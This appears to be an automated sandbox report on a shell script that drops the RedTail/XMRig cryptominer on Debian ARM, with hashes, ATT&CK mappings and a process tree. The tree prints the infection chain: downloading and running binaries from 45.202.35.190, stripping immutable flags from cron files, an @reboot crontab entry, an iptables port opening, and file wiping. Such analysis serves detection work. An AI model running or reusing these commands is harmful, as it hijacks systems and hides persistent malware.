xmrig | aed29398112ad074b8fd8a2e25020fb01db1f8cdaff86326222529dbeba5746b

Analysis

max time kernel
150s
max time network
154s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
24-11-2024 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sh.sh
Size

1KB
MD5

5a86127d998b5c3496802959ac0a3d11
SHA1

21d05b5a016cdd8245e24778e479bf6330867c3f
SHA256

aed29398112ad074b8fd8a2e25020fb01db1f8cdaff86326222529dbeba5746b
SHA512

3270ff6b4bb0dde62180e605a7fc114497df627c8cb5cb4865040e9d287123a4b4855d4e6e386757e9bba0b57f1ef02fb1d81204bfc83612ac87a109962b6e98

Score

10^/10

xmrig antivm defense_evasion discovery execution miner persistence privilege_escalatio upx

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (62386) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/839-1-0xb6b02000-0xb6e67454-memory.dmp	xmrig

File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmod

pid process

784 chmod
838 chmod
Executes dropped EXE 1 IoCs

Processes:

.redtail

ioc pid process

/.redtail 839 .redtail
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 95.215.19.53

pid	process
784	chmod
838	chmod

ioc	pid	process
/.redtail	839	.redtail

description	ioc
Destination IP	95.215.19.53

Attempts to change immutable files 24 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

shchattrchattrgrepchattrchattrgrepchattrgrepgrepgrepgrepgrepchattriptableschattrchattrchattrchattrchattrchattrgrepchattrchattr

pid	process
855	sh
790	chattr
801	chattr
802	grep
804	chattr
813	chattr
811	grep
814	chattr
817	grep
791	grep
796	grep
805	grep
808	grep
810	chattr
856	iptables
793	chattr
795	chattr
798	chattr
807	chattr
789	chattr
794	chattr
799	grep
815	chattr
816	chattr

Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.NACfta crontab
Enumerates running processes
Discovers information about currently running processes on the system

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.NACfta	crontab

Reads network interface configuration 2 TTPs 6 IoCs

Fetches information about one or more active network interfaces.

discovery

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

Processes:

find

description	ioc	process
File opened for reading	/sys/devices/virtual/net/lo/statistics	find
File opened for reading	/sys/devices/virtual/net/lo/power	find
File opened for reading	/sys/devices/virtual/net/lo/queues	find
File opened for reading	/sys/devices/virtual/net/lo/queues/tx-0	find
File opened for reading	/sys/devices/virtual/net/lo/queues/tx-0/byte_queue_limits	find
File opened for reading	/sys/devices/virtual/net/lo/queues/rx-0	find

UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
upx

Processes:

resource yara_rule

/arm7 upx
Changes its process name 1 IoCs

Processes:

.redtail

description ioc pid process

Changes the process name, possibly in an attempt to hide itself systemd 840 .redtail
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

.redtail

description ioc process

File opened for reading /proc/cpuinfo .redtail

resource	yara_rule
/arm7	upx

description	ioc	pid	process
Changes the process name, possibly in an attempt to hide itself	systemd	840	.redtail

description	ioc	process
File opened for reading	/proc/cpuinfo	.redtail

Reads CPU attributes 1 TTPs 27 IoCs

discovery

System Information Discovery

T1082

Processes:

.redtailfind

description	ioc	process
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpufreq	find
File opened for reading	/sys/devices/system/cpu/cpu0	find
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/topology/thread_siblings	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/power	find
File opened for reading	/sys/devices/system/cpu/online	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/topology	find
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_siblings	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	.redtail
File opened for reading	/sys/devices/system/cpu/hotplug	find
File opened for reading	/sys/devices/system/cpu/cpu0/power	find
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	.redtail
File opened for reading	/sys/devices/system/cpu/cpu0/hotplug	find

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

find

description	ioc	process
File opened for reading	/sys/devices/platform/serial8250/tty	find
File opened for reading	/sys/devices/platform/a000400.virtio_mmio	find
File opened for reading	/sys/bus/i2c/drivers/rtc-pcf8563	find
File opened for reading	/sys/kernel/irq/60	find
File opened for reading	/sys/kernel/debug/tracing/events/jbd2/jbd2_commit_flushing	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_sched_get_priority_min	find
File opened for reading	/sys/kernel/irq/49	find
File opened for reading	/sys/kernel/debug/tracing/events/ftrace/kernel_stack	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_sigsuspend	find
File opened for reading	/sys/devices/platform/a001200.virtio_mmio/power	find
File opened for reading	/sys/kernel/debug/tracing/events/regmap/regmap_hw_write_done	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_creat	find
File opened for reading	/sys/kernel/debug/tracing/events/signal/signal_deliver	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_getsid	find
File opened for reading	/sys/kernel/debug/tracing/events/ext4/ext4_sync_file_enter	find
File opened for reading	/sys/kernel/debug/tracing/events/ras/mc_event	find
File opened for reading	/sys/kernel/debug/tracing/events/ipi/ipi_raise	find
File opened for reading	/sys/module/ip_tables/holders	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_pciconfig_read	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_io_destroy	find
File opened for reading	/sys/kernel/debug/tracing/events/irq/softirq_entry	find
File opened for reading	/sys/bus/amba	find
File opened for reading	/sys/fs/cgroup/devices/system.slice/rsyslog.service	find
File opened for reading	/sys/bus/platform/devices	find
File opened for reading	/sys/kernel/debug/tracing/events/writeback/writeback_lazytime	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_fsync	find
File opened for reading	/sys/devices/virtual/graphics	find
File opened for reading	/sys/module/crc16/holders	find
File opened for reading	/sys/kernel/debug/tracing/events/thermal/thermal_zone_trip	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_init_module	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_pipe	find
File opened for reading	/sys/bus/platform/drivers/poweroff-gpio	find
File opened for reading	/sys/bus/platform/drivers/armada-375-usb-cluster	find
File opened for reading	/sys/module/virtio_mmio/notes	find
File opened for reading	/sys/module/crc16/sections	find
File opened for reading	/sys/module/xz_dec	find
File opened for reading	/sys/kernel/debug/tracing/events/rpm	find
File opened for reading	/sys/kernel/debug/tracing/events/cgroup/cgroup_remount	find
File opened for reading	/sys/devices/virtual/misc/psaux/power	find
File opened for reading	/sys/devices/virtual/tty/tty16	find
File opened for reading	/sys/fs/cgroup/systemd/system.slice/systemd-user-sessions.service	find
File opened for reading	/sys/module/ip_tables	find
File opened for reading	/sys/kernel/debug/tracing/events/iommu/attach_device_to_domain	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_setresuid	find
File opened for reading	/sys/bus/xen/drivers	find
File opened for reading	/sys/kernel/debug/tracing/events/kvm/kvm_age_page	find
File opened for reading	/sys/fs/cgroup/devices/system.slice/keyboard-setup.service	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_setresgid16	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_syslog	find
File opened for reading	/sys/kernel/debug/tracing/events/skb/skb_copy_datagram_iovec	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_fsetxattr	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_setresuid16	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_exit_group	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_fstatat64	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_perf_event_open	find
File opened for reading	/sys/devices/platform/a003e00.virtio_mmio/virtio1	find
File opened for reading	/sys/bus/platform/drivers/sunxi-rtc	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_mount	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_timer_settime	find
File opened for reading	/sys/kernel/debug/tracing/events/ftrace/funcgraph_entry	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_shmget	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_mkdirat	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_sigprocmask	find
File opened for reading	/sys/kernel/debug/tracing/events/kvm/kvm_hvc	find

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

find.redtailsystemctl

description	ioc	process
File opened for reading	/proc/147/task/147/net/stat	find
File opened for reading	/proc/286/net/netfilter	find
File opened for reading	/proc/414/cmdline	.redtail
File opened for reading	/proc/5	find
File opened for reading	/proc/23/task/23/fdinfo	find
File opened for reading	/proc/25/task/25	find
File opened for reading	/proc/25/map_files	find
File opened for reading	/proc/137/attr	find
File opened for reading	/proc/655/task/657/net/netfilter	find
File opened for reading	/proc/664/task/664/net/stat	find
File opened for reading	/proc/5/task/5/net/dev_snmp6	find
File opened for reading	/proc/6/net/stat	find
File opened for reading	/proc/22/task/22	find
File opened for reading	/proc/461/map_files	find
File opened for reading	/proc/649/ns	find
File opened for reading	/proc/1/map_files	find
File opened for reading	/proc/104/net/dev_snmp6	find
File opened for reading	/proc/664/fdinfo	find
File opened for reading	/proc/302/cmdline	.redtail
File opened for reading	/proc/605/net	find
File opened for reading	/proc/1/net/dev_snmp6	find
File opened for reading	/proc/9/net/dev_snmp6	find
File opened for reading	/proc/14/task/14/net/netfilter	find
File opened for reading	/proc/20/task/20/ns	find
File opened for reading	/proc/25/task/25/net/stat	find
File opened for reading	/proc/104/task/104/net/dev_snmp6	find
File opened for reading	/proc/149/task/149	find
File opened for reading	/proc/166/net/stat	find
File opened for reading	/proc/cpu	find
File opened for reading	/proc/10/task/10/fdinfo	find
File opened for reading	/proc/24/task/24	find
File opened for reading	/proc/41/ns	find
File opened for reading	/proc/95/task	find
File opened for reading	/proc/462/task/462/fdinfo	find
File opened for reading	/proc/139/task/139/net/netfilter	find
File opened for reading	/proc/265/task/278	find
File opened for reading	/proc/265/task/280/fdinfo	find
File opened for reading	/proc/8/task/8	find
File opened for reading	/proc/11/ns	find
File opened for reading	/proc/18/fdinfo	find
File opened for reading	/proc/27/task	find
File opened for reading	/proc/41/task/41/attr	find
File opened for reading	/proc/648/task/648	find
File opened for reading	/proc/649/net/dev_snmp6	find
File opened for reading	/proc/666/net/stat	find
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/265/task/265/attr	find
File opened for reading	/proc/266/task/266/ns	find
File opened for reading	/proc/286/task/286	find
File opened for reading	/proc/11/task/11/ns	find
File opened for reading	/proc/27/task/27/net/netfilter	find
File opened for reading	/proc/74/task/74/net/stat	find
File opened for reading	/proc/106/fd	find
File opened for reading	/proc/139/net/dev_snmp6	find
File opened for reading	/proc/649/net/stat	find
File opened for reading	/proc/650/net/netfilter	find
File opened for reading	/proc/666/attr	find
File opened for reading	/proc/11/task/11	find
File opened for reading	/proc/12/attr	find
File opened for reading	/proc/28/task/28/net/stat	find
File opened for reading	/proc/655/task/656/attr	find
File opened for reading	/proc/25/net	find
File opened for reading	/proc/29/task/29/fdinfo	find
File opened for reading	/proc/414/fd	find

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

sh

description ioc process

File opened for modification /tmp/clean_crontab sh

description	ioc	process
File opened for modification	/tmp/clean_crontab	sh

/tmp/sh.sh
/tmp/sh.sh
1⤵
PID:651
- /bin/cat
  cat /proc/mounts
  2⤵
  PID:660
- /bin/grep
  grep noexec
  2⤵
  PID:661
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:662
- /usr/bin/whoami
  whoami
  2⤵
  PID:668
- /usr/bin/find
  find / -type d -user root -perm "-u=rwx" -not -path "/tmp/*" -not -path "/proc/*" -not -path /sys -not -path "/sys/*" -not -path /proc -not -path "/proc/*" -not -path /dev/pts -not -path "/dev/pts/*" -not -path /run -not -path "/run/*" -not -path /sys/kernel/security -not -path "/sys/kernel/security/*" -not -path /run/lock -not -path "/run/lock/*" -not -path /sys/fs/cgroup -not -path "/sys/fs/cgroup/*" -not -path /sys/fs/cgroup/systemd -not -path "/sys/fs/cgroup/systemd/*" -not -path "/sys/fs/cgroup/net_cls,net_prio" -not -path "/sys/fs/cgroup/net_cls,net_prio/*" -not -path "/sys/fs/cgroup/cpu,cpuacct" -not -path "/sys/fs/cgroup/cpu,cpuacct/*" -not -path /sys/fs/cgroup/freezer -not -path "/sys/fs/cgroup/freezer/*" -not -path /sys/fs/cgroup/perf_event -not -path "/sys/fs/cgroup/perf_event/*" -not -path /sys/fs/cgroup/cpuset -not -path "/sys/fs/cgroup/cpuset/*" -not -path /sys/fs/cgroup/pids -not -path "/sys/fs/cgroup/pids/*" -not -path /sys/fs/cgroup/blkio -not -path "/sys/fs/cgroup/blkio/*" -not -path /sys/fs/cgroup/devices -not -path "/sys/fs/cgroup/devices/*" -not -path /sys/fs/cgroup/memory -not -path "/sys/fs/cgroup/memory/*"
  2⤵
  - Reads network interface configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:671
- /bin/uname
  uname -mp
  2⤵
  PID:777
- /usr/bin/touch
  touch .testfile
  2⤵
  PID:778
- /bin/dd
  dd "if=/dev/zero" "of=.testfile2" "bs=2M" "count=1"
  2⤵
  PID:780
- /bin/rm
  rm -rf .testfile .testfile2
  2⤵
  PID:781
- /usr/bin/wget
  wget http://45.202.35.190/clean
  2⤵
  PID:782
- /bin/chmod
  chmod +x clean
  2⤵
  - File and Directory Permissions Modification
  PID:784
- /bin/sh
  sh clean
  2⤵
  - Writes file to tmp directory
  PID:786
- - /bin/systemctl
    systemctl disable c3pool_miner
    3⤵
    - Reads runtime system information
    PID:787
- - /bin/systemctl
    systemctl stop c3pool_miner
    3⤵
    PID:788
- - /usr/bin/chattr
    chattr -ia /var/spool/cron/crontabs
    3⤵
    - Attempts to change immutable files
    PID:789
- - /usr/bin/chattr
    chattr -ia /etc/crontab
    3⤵
    - Attempts to change immutable files
    PID:790
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/crontab
    3⤵
    - Attempts to change immutable files
    PID:791
- - /bin/mv
    mv /tmp/clean_crontab /etc/crontab
    3⤵
    PID:792
- - /usr/bin/chattr
    chattr -ia /etc/cron.hourly
    3⤵
    - Attempts to change immutable files
    PID:793
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily
    3⤵
    - Attempts to change immutable files
    PID:794
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/apt-compat
    3⤵
    - Attempts to change immutable files
    PID:795
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/apt-compat
    3⤵
    - Attempts to change immutable files
    PID:796
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/apt-compat
    3⤵
    PID:797
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/bsdmainutils
    3⤵
    - Attempts to change immutable files
    PID:798
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/bsdmainutils
    3⤵
    - Attempts to change immutable files
    PID:799
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/bsdmainutils
    3⤵
    PID:800
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/dpkg
    3⤵
    - Attempts to change immutable files
    PID:801
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/dpkg
    3⤵
    - Attempts to change immutable files
    PID:802
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/dpkg
    3⤵
    PID:803
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/exim4-base
    3⤵
    - Attempts to change immutable files
    PID:804
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/exim4-base
    3⤵
    - Attempts to change immutable files
    PID:805
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/exim4-base
    3⤵
    PID:806
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/logrotate
    3⤵
    - Attempts to change immutable files
    PID:807
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/logrotate
    3⤵
    - Attempts to change immutable files
    PID:808
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/logrotate
    3⤵
    PID:809
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/passwd
    3⤵
    - Attempts to change immutable files
    PID:810
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/passwd
    3⤵
    - Attempts to change immutable files
    PID:811
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/passwd
    3⤵
    PID:812
- - /usr/bin/chattr
    chattr -ia /etc/cron.weekly
    3⤵
    - Attempts to change immutable files
    PID:813
- - /usr/bin/chattr
    chattr -ia /etc/cron.monthly
    3⤵
    - Attempts to change immutable files
    PID:814
- - /usr/bin/chattr
    chattr -ia /etc/cron.d
    3⤵
    - Attempts to change immutable files
    PID:815
- - /usr/bin/chattr
    chattr -ia /etc/anacrontab
    3⤵
    - Attempts to change immutable files
    PID:816
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/anacrontab
    3⤵
    - Attempts to change immutable files
    PID:817
- - /bin/mv
    mv /tmp/clean_crontab /etc/anacrontab
    3⤵
    PID:818
- - /bin/rm
    rm -rf /tmp/sh.sh
    3⤵
    PID:819
- - /bin/rm
    rm -rf "/var/tmp/*"
    3⤵
    PID:820
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:821
- /bin/rm
  rm -rf clean
  2⤵
  PID:822
- /bin/rm
  rm -rf .redtail
  2⤵
  PID:823
- /bin/grep
  grep -q x86_64
  2⤵
  PID:825
- /bin/grep
  grep -q amd64
  2⤵
  PID:827
- /bin/grep
  grep -q "i[3456]86"
  2⤵
  PID:829
- /bin/grep
  grep -q armv8
  2⤵
  PID:831
- /bin/grep
  grep -q aarch64
  2⤵
  PID:833
- /bin/grep
  grep -q armv7
  2⤵
  PID:835
- /usr/bin/wget
  wget http://45.202.35.190/arm7
  2⤵
  PID:836
- /bin/mv
  mv arm7 .redtail
  2⤵
  PID:837
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:838
- /.redtail
  ./.redtail
  2⤵
  - Executes dropped EXE
  - Changes its process name
  - Checks CPU configuration
  - Reads CPU attributes
  - Reads runtime system information
  PID:839
- - /bin/sh
    sh -c "command -v crontab >/dev/null 2>&1"
    3⤵
    PID:841
- - /bin/sh
    sh -c "crontab -r >/dev/null 2>&1; echo \"@reboot /.redtail\" | crontab -"
    3⤵
    PID:842
  - - /usr/bin/crontab
      crontab -r
      4⤵
      PID:843
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:845
- - /bin/sh
    sh -c "command -v php >/dev/null 2>&1"
    3⤵
    PID:846
- - /bin/sh
    sh -c "command -v nginx >/dev/null 2>&1"
    3⤵
    PID:847
- - /bin/sh
    sh -c "which apache2"
    3⤵
    PID:848
  - - /usr/bin/which
      which apache2
      4⤵
      PID:849
- - /bin/sh
    sh -c "which httpd"
    3⤵
    PID:850
  - - /usr/bin/which
      which httpd
      4⤵
      PID:851
- - /bin/sh
    sh -c "iptables -I INPUT -p tcp --dport 58919 -j ACCEPT >/dev/null 2>&1"
    3⤵
    - Attempts to change immutable files
    PID:855
  - - /sbin/iptables
      iptables -I INPUT -p tcp --dport 58919 -j ACCEPT
      4⤵
      Attempts to change immutable files
      PID:856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Information Discovery

T1082

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/.testfile2

Filesize
2.0MB

MD5
b2d1236c286a3c0704224fe4105eca49

SHA1
7d76d48d64d7ac5411d714a4bb83f37e3e5b8df6

SHA256
5647f05ec18958947d32874eeb788fa396a05d0bab7c1b71f112ceb7e9b31eee

SHA512
731859029215873fdac1c9f2f8bd25a334abf0f3a9e1b057cf2cacc2826d86b0c26a3fa920a936421401c0471f38857cb53ba905489ea46b185209fdff65b3b6

Download Submit
/arm7

Filesize
1.1MB

MD5
045daa66263bfd467051c013e9222faf

SHA1
4b943b14526d7bf7be2b3e3f9af24d1f35015548

SHA256
d4635f0f5ab84af5e5194453dbf60eaebf6ec47d3675cb5044e5746fb48bd4b4

SHA512
bd684e0909793c05a34891f2ffe289e00b66c634d8059a9301274ef764aff38ae6d5c0c224228d11007b297e32e00749b40197f77f7fc48c44c50ef3651bc41f

Download Submit
/clean

Filesize
795B

MD5
397ff5e54194072e6d8a44a0d8cc1b27

SHA1
42477b0c3b277b5e907b0a35c644f3291ed30a63

SHA256
d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e

SHA512
ff40c129e3b2891ae280bce97e52ee69aea18ca60ea7901f7efd4cf11d3bf1c4ee48e9eb90e5f045e080ab784ee2a9942c2bcf0a531b7f4602931f63c4b32d74

Download Submit
/tmp/clean_crontab

Filesize
1KB

MD5
30e858769aacd9cc309502f8d5c6aa0f

SHA1
927c06dd4d6cbb5ca02e9505011c8667c47f2d6e

SHA256
eff406c0943e1399e3e15fdb6ca2893a187d6b273f5bd9d17eec4e4b4c52b8cd

SHA512
f7f6e70925afe54fc2fdaae13a750b3c49fde9fa59d80af321885d270112ebb2291f034037708f1ba8515f3e3e1ca0a493cd1e002895aa699c469e0365ccde3c

Download Submit
/tmp/clean_crontab

Filesize
3KB

MD5
02f33c9e59b27bcd241e488cd48de072

SHA1
9247eee9b2310d56455beccf41c577ba16b78e3d

SHA256
2565ab0cb86a8cb7fd37a0401ad22624da886b8df9130a5bd4b566f404130c14

SHA512
1eda274264320a72cd58462b6c8a7747990a7eedf836be730b51b92ea6b04a1005aed596f9b9d53c4c8a93001d112450d0c6d83dfe4eee4b91a671623662fb3d

Download Submit
/tmp/clean_crontab

Filesize
249B

MD5
db990990933b6f56322725223f13c2bc

SHA1
387303696a796e27f559c73679e979f2a538072d

SHA256
777a9112ee093d8683645b031eb6cfeb9ce77274f40575c48ff2054ea24114d1

SHA512
a3764e580bcfe0b2100da8ff2a00bed4936cb2acc9985daef52fb0310a7ed3367a1944a355c3f1dbc92d82c82b54280926736f81bc138efb4f7df1814abee3b5

Download Submit
/tmp/clean_crontab

Filesize
722B

MD5
8f111d100ea459f68d333d63a8ef2205

SHA1
077ca9c46a964de67c0f7765745d5c6f9e2065c3

SHA256
0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354

SHA512
d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb

Download Submit
/tmp/clean_crontab

Filesize
1KB

MD5
bc4a71cbcaeed4179f25d798257fa980

SHA1
61445721d0b5d86ac0a8386a4ceef450118f4fbb

SHA256
8eeae3a9df22621d51062e4dadfc5c63b49732b38a37b5d4e52c99c2237e5767

SHA512
709badb4dd1a15a10b34f82d31ed4bbab81698190d2ec94e2ad3dcdc90d97b893eb61cde72f08e517a8beea08ec1d675385fd42a9e77530981b7d83c6bd3548c

Download Submit
/tmp/clean_crontab

Filesize
279B

MD5
911a774fe040993b929504f3d9415ab3

SHA1
55ccc8e95097f005abf9f4d91a14394e6d0f5da5

SHA256
340dfc483eb79b83b0630b1c0b339e30ebd724ef2f58bb87ba92946472e8e63d

SHA512
1eb8fd8dc6fd444ba2fa3ca7e863894cfb19383e5b20c700ed24aa615402340424d093a761632cf27a3e789ecd548ca972806e154161635da4f97b415d6fc64f

Download Submit
/var/spool/cron/crontabs/tmp.NACfta

Filesize
193B

MD5
fe38347169e810d2a1ed3112a21286a7

SHA1
cf61d0808c9c57799a814924d7beca28f09014c1

SHA256
5c5b16fa7fa24f51c56d30c4e08f1513bbf9512ef62ffec09a8bcb04314b78c2

SHA512
eb893eb6d7cd1aab15ec3d0055c7eeb308e9f4eae7cd755c1f531669a23ca8f44c2d57ed31a69af1173595ea02b3370e49b084c748b772815a08d17ef361b611

Download Submit
memory/839-1-0xb6b02000-0xb6e67454-memory.dmp

Download